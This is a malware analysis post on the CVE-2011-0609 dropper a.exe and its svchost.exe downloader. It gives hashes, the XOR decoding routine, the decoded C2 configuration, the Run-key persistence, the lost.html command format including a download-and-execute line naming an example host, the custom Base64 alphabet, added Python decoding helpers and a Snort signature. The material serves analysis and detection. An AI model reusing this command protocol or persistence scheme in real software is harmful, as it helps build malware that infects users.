CVE-2011-0609 payload a.exe analysis

ANALYSIS OF A.EXE

File Name: a.exe
File Size: 46048 bytes
MD5: 1e09970c9bf2ca08ee48f8b2e24f6c44
SHA1: 985b38b338a6b8371ea2179c4eda3563f21f7082
PE Time: 0x4D75F8E7 [Tue Mar 08 09:37:43 2011 UTC]

  • This executable uses this working directory: C:\DOCUME~1\username\LOCALS~1\Temp\
  • This executable file contains two MS CAB files embedded in it.
  • It creates a file named ~FO1.tmp, and carves out the first CAB file located at file-offset 0x9BD4
  • This file has the following characteristics:

File Name: ~FO1.tmp
File Size: 6156 bytes
MD5: 5d68ccb09314a6113eb733b1817a4b31
SHA1: a0053e36388bc90ee3731514c1bc697651f995cf

This CAB file contains the decoy XLS document that is shown to the user (i.e. this file is not malicious).

File Name: crsenvironscan2.xls
File Size: 29184 bytes
MD5: 1990c787e54a7e96e4cb550d83e9d3f4
SHA1: 4131b026fc2d0285ee4aac5000ea5a3b0455e78a

  • This executable extracts file crsenvironscan2.xls, opens it, and deletes ~FO1.tmp.
  • This executable then carves out the second CAB file, which is located at file-offset 0x1400, and saves it as ~FO2.tmp.
  • This CAB file has the following characteristics:

File Name: ~FO2.tmp
File Size: 34772 bytes
MD5: 1363ee814f017188488f17fda837ac0f
SHA1: 8d2de8b4aa7a60675fccca619f94c6fac34ad2e3

    • This CAB file contains an executable file named svchost.exe, which is a Downloader.
    • This embedded executable has the following characteristics:

File Name: svchost.exe
File Size: 65536 bytes
MD5: 90993b5279365b204148e8b04edf477f
SHA1: 1d3de34f6282d66f689f978855fa5ebbb123d0b4
PE Time: 0x4D66062D [Thu Feb 24 07:18:05 2011 UTC]

    • The analysis of svchost.exe is further down this document.
    • File svchost.exe is extracted from the CAB file and executed, while file ~FO2.tmp is deleted.
  • File a.exe then ensures that a filename derived from a call to GetTickCount does not already exist in the C:\RECYCLER\ folder, and then moves a.exe to this new location using the MoveFileW call. Here is an example of the arguments passed to MoveFileW:

ExistingName = "C:\Documents and Settings\username\Desktop\a.exe"
NewName = "C:\RECYCLER\18653343.tmp"

  • This executable (a.exe) then exits.
  • Additional notes on a.exe:
  • Checks for the presence of a process named excel.exe and, if it exists, kills it. This is done prior to opening the decoy document.
  • It decodes the following data:
 00403010  39 58 5B 15 4C 4D 4D 3F 40 41 42 43 44 45 46 47  9X[LMM?@ABCDEFG
 00403020  48 49 4A 4B 98 CA 4E 4F 5C 49 52 53 25           HIJK˜ÊNO\IRS%
  • Using this algorithm:
 004010C0  /$  33C0                    XOR EAX, EAX
 004010C2  |>  8A0D 10304000           /MOV CL, BYTE PTR DS:[403010]
 004010C8  |.  8A90 11304000           |MOV DL, BYTE PTR DS:[EAX+403011]
 004010CE  |.  02C8                    |ADD CL, AL
 004010D0  |.  32D1                    |XOR DL, CL
 004010D2  |.  8890 11304000           |MOV BYTE PTR DS:[EAX+403011], DL
 004010D8  |.  40                      |INC EAX
 004010D9  |.  83F8 1B                 |CMP EAX, 1B
 004010DC  |.^ 7C E4                   \JL SHORT a.004010C2
 004010DE  \.  C3                      RETN
  • The data decodes to:
 00403010  39 61 61 2E 70 70 73 00 00 00 00 00 00 00 00 00  9aa.pps.........
 00403020  00 00 00 00 D4 87 00 00 0C 18 00 00 25           ....Ô‡.....%
  • This decoded data does not appear to be used (this is after placing a Hardware BP on access on this data).
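The decode loop above, reimplemented in Python as an added example (not code from the original post) so the 29-byte blob at 00403010 can be decoded and checked offline; the same loop with a count of 0x287 is what svchost.exe applies to its configuration block, so the function takes the count as a parameter.

```python
# Python reimplementation of the XOR loop at a.exe 004010C0 (and svchost.exe 00402670).
# Added example; the encoded bytes below are the 29 bytes dumped at 00403010 in the post.
ENCODED_A_EXE = bytes.fromhex(
    "39 58 5B 15 4C 4D 4D 3F 40 41 42 43 44 45 46 47"
    "48 49 4A 4B 98 CA 4E 4F 5C 49 52 53 25"
)


def decode_blob(buf: bytes, count: int) -> bytes:
    """Decode `count` bytes after the key byte, mirroring the assembly:

        CL = buf[0]                        ; key byte, itself never modified
        for EAX in 0..count-1:             ; CMP EAX, count / JL
            buf[EAX+1] ^= (CL + EAX) & 0xFF   ; ADD CL, AL / XOR DL, CL / store
    """
    if count + 1 > len(buf):
        raise ValueError("count exceeds buffer: loop would run past the blob")
    out = bytearray(buf)
    key = out[0]
    for i in range(count):
        out[i + 1] ^= (key + i) & 0xFF
    return bytes(out)


def ascii_strings(data: bytes, min_len: int = 4) -> list:
    """Printable runs separated by NULs or binary, the layout the svchost config uses."""
    runs, cur = [], bytearray()
    for b in data:
        if 0x20 <= b < 0x7F:
            cur.append(b)
        else:
            if len(cur) >= min_len:
                runs.append(cur.decode("ascii"))
            cur = bytearray()
    if len(cur) >= min_len:
        runs.append(cur.decode("ascii"))
    return runs


if __name__ == "__main__":
    decoded = decode_blob(ENCODED_A_EXE, 0x1B)   # CMP EAX, 1B in a.exe
    print(decoded.hex(" "))                      # matches the dump at 00403010 after decoding
    print(ascii_strings(decoded))                # ['9aa.pps']
```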

ANALYSIS OF SVCHOST.EXE

File Name: svchost.exe
File Size: 65536 bytes
MD5: 90993b5279365b204148e8b04edf477f
SHA1: 1d3de34f6282d66f689f978855fa5ebbb123d0b4
PE Time: 0x4D66062D [Thu Feb 24 07:18:05 2011 UTC]

  • The Trojan decodes 0x287 bytes starting at file-offset 0xEB68 using this simple algorithm, which was also used by a.exe:
00402670  /$  33C0                  XOR EAX, EAX
00402672  |>  8A0D 68114100         /MOV CL, BYTE PTR DS:[411168]
00402678  |.  8A90 69114100         |MOV DL, BYTE PTR DS:[EAX+411169]
0040267E  |.  02C8                  |ADD CL, AL
00402680  |.  32D1                  |XOR DL, CL
00402682  |.  8890 69114100         |MOV BYTE PTR DS:[EAX+411169], DL
00402688  |.  40                    |INC EAX
00402689  |.  3D 87020000           |CMP EAX, 287
0040268E  |.^ 7C E2                 \JL SHORT svchost.00402672
00402690  \.  C3                    RETN
  • The encoded data decodes to the following, which appears to be configuration information:
00411168  E9 68 74 74 70 3A 2F 2F 6E 65 77 73 2E 67 6F 6F  éhttp://news.goo
00411178  67 6C 65 75 70 64 61 74 65 73 65 72 76 69 63 65  gleupdateservice
00411188  73 2E 63 6F 6D 2F 68 74 6D 6C 2F 6C 6F 73 74 2E  s.com/html/lost.
00411198  68 74 6D 6C 00 00 00 00 00 00 00 00 00 00 00 00  html............
004111A8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
004111B8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
004111C8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
004111D8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
004111E8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
004111F8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00411208  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00411218  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00411228  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00411238  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00411248  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00411258  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00411268  00 00 00 00 01 00 00 00 3C 21 2D 2D 20 67 6F 6F  .......<!-- goo
00411278  67 6C 65 5F 61 64 00 00 00 00 00 00 00 00 00 00  gle_ad..........
00411288  00 00 00 00 00 00 00 00 20 68 65 69 67 68 74 20  ........ height
00411298  2D 2D 3E 00 00 00 00 00 00 00 00 00 00 00 00 00  -->.............
004112A8  00 00 00 00 00 00 00 00 61 64 5F 73 6C 6F 74 00  ........ad_slot.
004112B8  00 00 00 00 00 00 00 00 61 64 5F 77 69 64 74 68  ........ad_width
004112C8  00 00 00 00 00 00 00 00 61 64 5F 68 65 69 67 68  ........ad_heigh
004112D8  74 00 00 00 00 00 00 00 53 6F 66 74 77 61 72 65  t.......Software
004112E8  5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F  \Microsoft\Windo
004112F8  77 73 5C 43 75 72 72 65 6E 74 56 65 72 73 69 6F  ws\CurrentVersio
00411308  6E 5C 52 75 6E 00 00 00 00 00 00 00 00 00 00 00  n\Run...........
00411318  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00411328  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00411338  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00411348  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00411358  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00411368  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00411378  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00411388  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00411398  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
004113A8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
004113B8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
004113C8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
004113D8  00 00 00 00 00 00 00 00 41 64 6F 62 65 55 70 64  ........AdobeUpd
004113E8  61 74 65 00 00 00 00 00 02 00 00 00 00 00 00 00  ate............
  • The Trojan sleeps for 1 minute before entrenching itself in the registry under:
  • Software\Microsoft\Windows\CurrentVersion\Run

ValueName = AdobeUpdate
Set to: C:\Documents and Settings\username\Local Settings\Temp\svchost.exe

  • The Trojan then sends the following GET request:
GET /html/lost.html HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
Host: news.googleupdateservices.com
Connection: Keep-Alive
  • At the time of this analysis, the domain news.googleupdateservices.com resolves to 127.0.0.1, so I do not have the file lost.html for analysis. However, what follows describes what may be found in this file if anyone gets their hands on it.
  • The Trojan creates a file named C:\DOCUME~1\username\LOCALS~1\Temp\X60E and places the content of lost.html into this file.
  • The Trojan parses the HTML file data for the following content:
    • <!-- google_adINSTRUCTION height -->
  • Valid values for INSTRUCTION are these three strings: ad_width, ad_height, or ad_slot.
  • These three strings represent instructions that tell the Trojan what to do next.
  • ad_slot tells the Trojan how many tens-minutes to sleep.
  • So, an example may look like this:
    • <!-- google_adad_slot1 height -->
  • Where 1 indicates the number of tens-minutes the Trojan will sleep.
  • The ones-minute is always 4. So, in our example above the Trojan will sleep 14 minutes.
  • So, if we had:
    •  <!-- google_adad_slot10 height -->
  • then the Trojan will sleep 104 minutes.
  • ad_width causes the Trojan process to terminate.
  • So, an example of this may look like:
    • <!-- google_adad_width height -->
  • ad_height tells the Trojan to download and execute a file.
  • So, an example of what lost.html may contain looks like this:
    • <!-- google_adad_heighthttp://www.reallybad.com/Trojan2.jpg height -->
  • The Trojan issues a GET request for the specified file:
GET /Trojan2.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
Host: www.reallybad.com
Connection: Keep-Alive
  • File Trojan2.jpg is downloaded and saved in the Temp folder without its extension (so just as Trojan2).
  • The downloaded file is expected to be Base64 encoded using the following custom alphabet:
    • abhijstuDEFGHIvwxynopqr5678QRS9+/TUzklmVWXYZABCJKLMNOP01cdefg234
  • The decoded version of Trojan2 is saved in the same directory as Trojan2.exe.
  • Trojan2.exe is then executed as a child process of svchost.exe (I fed this Trojan an encoded version of bintext.exe).
  • From the forensics perspective, none of the files in the Temp folder are deleted. In addition, any file that is downloaded is also cached on the system, so you will find a copy there as well.
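The lost.html instruction format and the custom-alphabet Base64 described above, as an added Python example (not code from the original post) that a responder could run against a cached copy of lost.html or the extension-less Temp\Trojan2 file. Assumptions: the payload uses '=' padding like standard Base64, and the sample inputs (including the post's own example URL) are constructed.

```python
import base64
import re

# Added example. Marker format from the analysis: <!-- google_ad<INSTRUCTION><arg> height -->
MARKER = re.compile(r"<!-- google_ad(ad_width|ad_height|ad_slot)(\S*) height -->")

# Custom alphabet quoted in the analysis. It is a permutation of the standard alphabet,
# so decoding is a character translation followed by ordinary Base64.
CUSTOM_ALPHABET = "abhijstuDEFGHIvwxynopqr5678QRS9+/TUzklmVWXYZABCJKLMNOP01cdefg234"
STD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
_TO_STD = str.maketrans(CUSTOM_ALPHABET, STD_ALPHABET)


def parse_instruction(html: str):
    """Return (action, argument) for the first marker found in the page, or None.

    ad_slot<N>      -> ("sleep", N*10 + 4)   minutes; the ones digit is always 4
    ad_width        -> ("terminate", None)
    ad_height<URL>  -> ("download", URL)
    """
    m = MARKER.search(html)
    if not m:
        return None
    instr, arg = m.group(1), m.group(2)
    if instr == "ad_slot":
        return ("sleep", int(arg) * 10 + 4)
    if instr == "ad_width":
        return ("terminate", None)
    return ("download", arg)


def decode_custom_b64(text: str) -> bytes:
    """Decode a file written in the Trojan's alphabet (what Temp\\Trojan2 would hold).

    Assumption: '=' padding as in standard Base64; missing padding is tolerated.
    """
    translated = "".join(text.split()).translate(_TO_STD)
    translated += "=" * (-len(translated) % 4)
    return base64.b64decode(translated, validate=True)


if __name__ == "__main__":
    # Constructed sample of lost.html content and of a custom-encoded download.
    sample_html = "<html><!-- google_adad_heighthttp://www.reallybad.com/Trojan2.jpg height --></html>"
    print(parse_instruction(sample_html))        # ('download', 'http://www.reallybad.com/Trojan2.jpg')
    print(decode_custom_b64("oqYxaa=="))         # b'MZ\x90\x00', i.e. "TVqQAA==" in standard Base64
```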
  1. Dave, 03-17-11

    Like the ad_xxx stuff use. Clever.

  2. hbojaxhi, 04-29-11

    Jim Chrisos kindly submitted the following SNORT signature for this Trojan:

    alert tcp any [80,443] -> any any (msg:"Possible Linxder trojan command"; content:"|3c 21 2d 2d 20 67 6f 6f 67 6c 65 5f 61 64 61 64|"; sid:1xxxxxx; rev:2; reference:url,http://www.cyberesi.com/2011/03/16/cve-2011-0609-payload-a-exe-analysis/;)
